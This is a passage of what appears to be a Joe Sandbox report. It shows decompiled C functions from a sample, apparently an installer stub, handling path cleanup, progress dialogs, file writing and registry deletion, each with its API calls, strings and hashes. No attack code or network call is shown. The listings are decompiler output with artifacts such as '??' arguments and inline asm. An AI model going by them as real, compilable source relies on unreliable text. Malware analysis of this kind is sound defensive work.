                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004068EF(WCHAR* _a4) {
                    				short _t5;
                    				short _t7;
                    				WCHAR* _t19;
                    				WCHAR* _t20;
                    				WCHAR* _t21;
                    
                    				_t20 = _a4;
                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                    					_t20 =  &(_t20[4]);
                    				}
                    				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                    					_t20 =  &(_t20[2]);
                    				}
                    				_t5 =  *_t20;
                    				_t21 = _t20;
                    				_t19 = _t20;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                    							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                    							_t19 = CharNextW(_t19);
                    						}
                    						_t20 = CharNextW(_t20);
                    						_t5 =  *_t20;
                    					} while (_t5 != 0);
                    				}
                    				 *_t19 =  *_t19 & 0x00000000;
                    				while(1) {
                    					_push(_t19);
                    					_push(_t21);
                    					_t19 = CharPrevW();
                    					_t7 =  *_t19;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t19 =  *_t19 & 0x00000000;
                    					if(_t21 < _t19) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}









                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                    • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                    • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-4010320282
                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040302E(intOrPtr _a4) {
                    				short _v132;
                    				long _t6;
                    				struct HWND__* _t7;
                    				struct HWND__* _t15;
                    
                    				if(_a4 != 0) {
                    					_t15 =  *0x420efc;
                    					if(_t15 != 0) {
                    						_t15 = DestroyWindow(_t15);
                    					}
                    					 *0x420efc = 0;
                    					return _t15;
                    				}
                    				if( *0x420efc != 0) {
                    					return E00406A71(0);
                    				}
                    				_t6 = GetTickCount();
                    				if(_t6 >  *0x42a26c) {
                    					if( *0x42a268 == 0) {
                    						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                    						 *0x420efc = _t7;
                    						return ShowWindow(_t7, 5);
                    					}
                    					if(( *0x42a314 & 0x00000001) != 0) {
                    						wsprintfW( &_v132, L"... %d%%", E00403012());
                    						return E004056CA(0,  &_v132);
                    					}
                    				}
                    				return _t6;
                    			}








                    APIs
                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                    • GetTickCount.KERNEL32 ref: 00403067
                    • wsprintfW.USER32 ref: 00403095
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                    • CreateDialogParamW.USER32 ref: 004030B9
                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 722711167-2449383134
                    • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                    • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;
                    				signed char _v12;
                    				unsigned int _v16;
                    				void* _v20;
                    				intOrPtr _v24;
                    				long _v56;
                    				void* _v60;
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;
                    					SendMessageW(_t28, 0x113e, 0,  &_v60);
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;
                    				_v20 = _t19;
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}















                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                    • GetMessagePos.USER32 ref: 00404FA2
                    • ScreenToClient.USER32 ref: 00404FBC
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                    				short _v132;
                    				void* _t11;
                    				WCHAR* _t19;
                    
                    				if(_a8 == 0x110) {
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
                    				if(_a8 == 0x113) {
                    					_t11 = E00403012();
                    					_t19 = L"unpacking data: %d%%";
                    					if( *0x42a270 == 0) {
                    						_t19 = L"verifying installer: %d%%";
                    					}
                    					wsprintfW( &_v132, _t19, _t11);
                    					SetWindowTextW(_a4,  &_v132);
                    					SetDlgItemTextW(_a4, 0x406,  &_v132);
                    				}
                    				return 0;
                    			}







                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                    • wsprintfW.USER32 ref: 00402FE5
                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                    • SetDlgItemTextW.USER32 ref: 00403007
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00402950(void* __ebx) {
                    				WCHAR* _t26;
                    				void* _t29;
                    				long _t37;
                    				void* _t49;
                    				void* _t52;
                    				void* _t54;
                    				void* _t56;
                    				void* _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_t49 = __ebx;
                    				_t52 = 0xfffffd66;
                    				_t26 = E00402DA6(0xfffffff0);
                    				_t55 = _t26;
                    				 *(_t61 - 0x40) = _t26;
                    				if(E00405FAE(_t26) == 0) {
                    					E00402DA6(0xffffffed);
                    				}
                    				E00406133(_t55);
                    				_t29 = E00406158(_t55, 0x40000000, 2);
                    				 *(_t61 + 8) = _t29;
                    				if(_t29 != 0xffffffff) {
                    					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                    					if( *(_t61 - 0x28) != _t49) {
                    						_t37 =  *0x42a274;
                    						 *(_t61 - 0x44) = _t37;
                    						_t54 = GlobalAlloc(0x40, _t37);
                    						if(_t54 != _t49) {
                    							E004035F8(_t49);
                    							E004035E2(_t54,  *(_t61 - 0x44));
                    							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                    							 *(_t61 - 0x10) = _t59;
                    							if(_t59 != _t49) {
                    								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                    								while( *_t59 != _t49) {
                    									_t51 =  *_t59;
                    									_t60 = _t59 + 8;
                    									 *(_t61 - 0x3c) =  *_t59;
                    									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                    									_t59 = _t60 +  *(_t61 - 0x3c);
                    								}
                    								GlobalFree( *(_t61 - 0x10));
                    							}
                    							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                    							GlobalFree(_t54);
                    							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                    						}
                    					}
                    					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                    					CloseHandle( *(_t61 + 8));
                    				}
                    				_t56 = 0xfffffff3;
                    				if(_t52 < _t49) {
                    					_t56 = 0xffffffef;
                    					DeleteFileW( *(_t61 - 0x40));
                    					 *((intOrPtr*)(_t61 - 4)) = 1;
                    				}
                    				_push(_t56);
                    				E00401423();
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                    				return 0;
                    			}














                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                    • GlobalFree.KERNEL32 ref: 00402A06
                    • GlobalFree.KERNEL32 ref: 00402A19
                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                    • String ID:
                    • API String ID: 2667972263-0
                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                    				char _v68;
                    				char _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t44;
                    				signed int _t46;
                    				signed int _t50;
                    				signed int _t52;
                    				signed int _t53;
                    				signed int _t55;
                    
                    				_t23 = _a16;
                    				_t53 = _a12;
                    				_t44 = 0xffffffdc;
                    				if(_t23 == 0) {
                    					_push(0x14);
                    					_pop(0);
                    					_t24 = _t53;
                    					if(_t53 < 0x100000) {
                    						_push(0xa);
                    						_pop(0);
                    						_t44 = 0xffffffdd;
                    					}
                    					if(_t53 < 0x400) {
                    						_t44 = 0xffffffde;
                    					}
                    					if(_t53 < 0xffff3333) {
                    						_t52 = 0x14;
                    						asm("cdq");
                    						_t24 = 1 / _t52 + _t53;
                    					}
                    					_t25 = _t24 & 0x00ffffff;
                    					_t55 = _t24 >> 0;
                    					_t46 = 0xa;
                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                    				} else {
                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                    					_t50 = 0;
                    				}
                    				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                    				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                    				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                    				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                    				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                    			}




















                    APIs
                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                    • wsprintfW.USER32 ref: 00404F1B
                    • SetDlgItemTextW.USER32 ref: 00404F2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s$H7B
                    • API String ID: 3540041739-107966168
                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                    				void* _v8;
                    				int _v12;
                    				short _v536;
                    				void* _t27;
                    				signed int _t33;
                    				intOrPtr* _t35;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t47;
                    
                    				_t46 = _a12;
                    				_t47 = _t46 & 0x00000300;
                    				_t45 = _t46 & 0x00000001;
                    				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                    				if(_t27 == 0) {
                    					if((_a12 & 0x00000002) == 0) {
                    						L3:
                    						_push(0x105);
                    						_push( &_v536);
                    						_push(0);
                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                    							__eflags = _t45;
                    							if(__eflags != 0) {
                    								L10:
                    								RegCloseKey(_v8);
                    								return 0x3eb;
                    							}
                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                    							__eflags = _t33;
                    							if(_t33 != 0) {
                    								break;
                    							}
                    							_push(0x105);
                    							_push( &_v536);
                    							_push(_t45);
                    						}
                    						RegCloseKey(_v8);
                    						_t35 = E00406A35(3);
                    						if(_t35 != 0) {
                    							return  *_t35(_a4, _a8, _t47, 0);
                    						}
                    						return RegDeleteKeyW(_a4, _a8);
                    					}
                    					_v12 = 0;
                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                    						goto L10;
                    					}
                    					goto L3;
                    				}
                    				return _t27;
                    			}













                    APIs
                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
                    				struct HWND__* _t30;
                    				WCHAR* _t38;
                    				void* _t48;
                    				void* _t53;
                    				signed int _t55;
                    				signed int _t60;
                    				long _t63;
                    				void* _t65;
                    
                    				_t53 = __ebx;
                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                    				} else {
                    					E00402D84(2);
                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                    				}
                    				_t55 =  *(_t65 - 0x24);
                    				 *(_t65 + 8) = _t30;
                    				_t60 = _t55 & 0x00000004;
                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                    				if((_t55 & 0x00010000) == 0) {
                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                    				} else {
                    					_t38 = E00402DA6(0x11);
                    				}
                    				 *(_t65 - 0x44) = _t38;
                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                    				asm("sbb esi, esi");
                    				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                    					DeleteObject(_t48);
                    				}
                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                    					_push(_t63);
                    					E004065AF();
                    				}
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                    				return 0;
                    			}












                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
